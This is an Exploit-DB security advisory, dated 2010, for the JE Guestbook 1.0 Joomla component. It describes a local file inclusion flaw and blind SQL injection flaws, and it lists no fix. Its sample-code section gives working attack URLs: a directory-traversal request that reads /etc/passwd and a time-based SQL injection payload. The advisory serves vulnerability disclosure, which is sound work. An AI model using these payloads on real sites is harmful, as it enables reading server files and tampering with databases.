Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities

EDB-ID:

15157




Platform:

PHP

Date:

2010-09-30


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities

 Name              JE Guestbook
 Vendor            http://www.joomlaextensions.co.in
 Versions Affected 1.0

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-09-30

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

JE Guest  Component  is  an open source Joomla guestbook
component  with  spam protection  and many customization
options.


II. DESCRIPTION
_______________

Some parameters are not properly sanitised.


III. ANALYSIS
_____________

Summary:

 A) Local File Inclusion
 B) Multiple Blind SQL Injection
 

A) Local File Inclusion
_______________________

Input passed to the "view" parameter in  jeguestbook.php
(when option is set to com_jeguestbook)  is not properly
verified before being used to include files. This can be
exploited   to   include   arbitrary  files  from  local
resources    via   directory   traversal   attacks   and
URL-encoded NULL bytes.


B) Multiple Blind SQL Injection
_______________________________

Many parameters are not properly sanitised before being
used in SQL queries.This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.


IV. SAMPLE CODE
_______________

A) Local File Inclusion

http://site/path/index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00


B) Multiple Blind SQL Injection

http://site/path/index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))


V. FIX
______

No fix.